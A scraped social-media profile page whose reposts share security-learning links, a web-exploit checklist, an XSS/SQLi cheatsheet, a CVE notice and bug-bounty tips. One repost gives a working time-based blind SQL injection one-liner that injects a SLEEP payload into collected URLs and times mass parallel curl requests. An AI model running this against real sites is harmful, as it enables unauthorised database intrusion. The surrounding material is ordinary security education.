thebinarychunk's profile picture.

𝖇𝖎𝖓𝖆𝖗𝖞𝖈𝖍𝖚𝖓𝖐

@thebinarychunk

ปักหมุด

No one really cares about you, so just focus on yourself; in the end, you will be alone anyway.


𝖇𝖎𝖓𝖆𝖗𝖞𝖈𝖍𝖚𝖓𝖐 รีโพสต์แล้ว

The one who took the photo


𝖇𝖎𝖓𝖆𝖗𝖞𝖈𝖍𝖚𝖓𝖐 รีโพสต์แล้ว

Excellent introduction to cryptography concepts for beginners with practical examples in Linux (openssl) (credits @sergioprado) Part 1: sergioprado.blog/introduction-t… Part 2: sergioprado.blog/a-hands-on-app… Part 3: sergioprado.blog/asymmetric-key… #cryptography #infosec #cybersecurity

0xor0ne's tweet image. Excellent introduction to cryptography concepts for beginners with practical examples in Linux (openssl)
(credits @sergioprado)

Part 1: sergioprado.blog/introduction-t…
Part 2: sergioprado.blog/a-hands-on-app…
Part 3: sergioprado.blog/asymmetric-key…

#cryptography #infosec #cybersecurity
0xor0ne's tweet image. Excellent introduction to cryptography concepts for beginners with practical examples in Linux (openssl)
(credits @sergioprado)

Part 1: sergioprado.blog/introduction-t…
Part 2: sergioprado.blog/a-hands-on-app…
Part 3: sergioprado.blog/asymmetric-key…

#cryptography #infosec #cybersecurity
0xor0ne's tweet image. Excellent introduction to cryptography concepts for beginners with practical examples in Linux (openssl)
(credits @sergioprado)

Part 1: sergioprado.blog/introduction-t…
Part 2: sergioprado.blog/a-hands-on-app…
Part 3: sergioprado.blog/asymmetric-key…

#cryptography #infosec #cybersecurity

𝖇𝖎𝖓𝖆𝖗𝖞𝖈𝖍𝖚𝖓𝖐 รีโพสต์แล้ว

Web Application Exploits Checklist in a sum❗👻 Don't forget to add it to your bookmarks.🤞🏻☺️ #cybersecuritytips #appsec #PenTest #BugBounty #exploits #checklist Part I ⬇️

brcyrr's tweet image. Web Application Exploits Checklist in a sum❗👻

Don't forget to add it to your bookmarks.🤞🏻☺️

#cybersecuritytips #appsec #PenTest #BugBounty #exploits #checklist 

Part I ⬇️

𝖇𝖎𝖓𝖆𝖗𝖞𝖈𝖍𝖚𝖓𝖐 รีโพสต์แล้ว

SQLi Time Based with Curl apt install moreutils apt install parallel cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt (or any other payload) cat blindsqli.txt | parallel -j50 -q curl -o /dev/null -s -w %{time_total}\\n

adrielsec's tweet image. SQLi Time Based with Curl
apt install moreutils
apt install parallel 

cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt    (or any other payload)

cat blindsqli.txt | parallel -j50 -q curl -o /dev/null -s -w %{time_total}\\n

𝖇𝖎𝖓𝖆𝖗𝖞𝖈𝖍𝖚𝖓𝖐 รีโพสต์แล้ว

100 Days of Hacking! Day 31 #SpeciaL ⬇ ~# WebHacking (BugBounty) Cheatsheet 📢 1. Cross Site Scripting ( XSS ) Vulnerability - github.com/EdOverflow/bug… - github.com/payloadbox/xss… - portswigger.net/web-security/c… 2. SQL Injection - github.com/EdOverflow/bug… -…


𝖇𝖎𝖓𝖆𝖗𝖞𝖈𝖍𝖚𝖓𝖐 รีโพสต์แล้ว

CVE-2023-28252: Windows Common Log File System Driver Elevation of Privilege Vulnerability #cybersecurity #infosec #incidentresponse #securityanalyst googleprojectzero.github.io/0days-in-the-w…

themealsready's tweet image. CVE-2023-28252: Windows Common Log File System Driver Elevation of Privilege Vulnerability
#cybersecurity #infosec #incidentresponse #securityanalyst
googleprojectzero.github.io/0days-in-the-w…

𝖇𝖎𝖓𝖆𝖗𝖞𝖈𝖍𝖚𝖓𝖐 รีโพสต์แล้ว

found this Stanford course for web security; with exam papers, assignments, labs & everything: web.stanford.edu/class/cs253/ a true goldmine 🫡


𝖇𝖎𝖓𝖆𝖗𝖞𝖈𝖍𝖚𝖓𝖐 รีโพสต์แล้ว

If you attended #bsidesseattle today, we hope you had the opportunity to stop by our booth to learn more about MSRC and chat with our team.

msftsecresponse's tweet image. If you attended #bsidesseattle today, we hope you had the opportunity to stop by our booth to learn more about MSRC and chat with our team.

𝖇𝖎𝖓𝖆𝖗𝖞𝖈𝖍𝖚𝖓𝖐 รีโพสต์แล้ว

When you have a super-huge scope (*.target.*.*), fire-up your VPS and feed everything to it and go to sleep. I found this critical vulnerability using unmodified @pdnuclei. Btw, I wonder why the severity says "medium" in Nuclei, where it supposed to be critical 10. #BugBounty

nav1n0x's tweet image. When you have a super-huge scope (*.target.*.*), fire-up your VPS and feed everything to it and go to sleep. I found this critical vulnerability using unmodified @pdnuclei. Btw, I wonder why the severity says "medium" in Nuclei, where it supposed to be critical 10. #BugBounty
nav1n0x's tweet image. When you have a super-huge scope (*.target.*.*), fire-up your VPS and feed everything to it and go to sleep. I found this critical vulnerability using unmodified @pdnuclei. Btw, I wonder why the severity says "medium" in Nuclei, where it supposed to be critical 10. #BugBounty
nav1n0x's tweet image. When you have a super-huge scope (*.target.*.*), fire-up your VPS and feed everything to it and go to sleep. I found this critical vulnerability using unmodified @pdnuclei. Btw, I wonder why the severity says "medium" in Nuclei, where it supposed to be critical 10. #BugBounty

United States เทรนด์

Loading...

Something went wrong.


Something went wrong.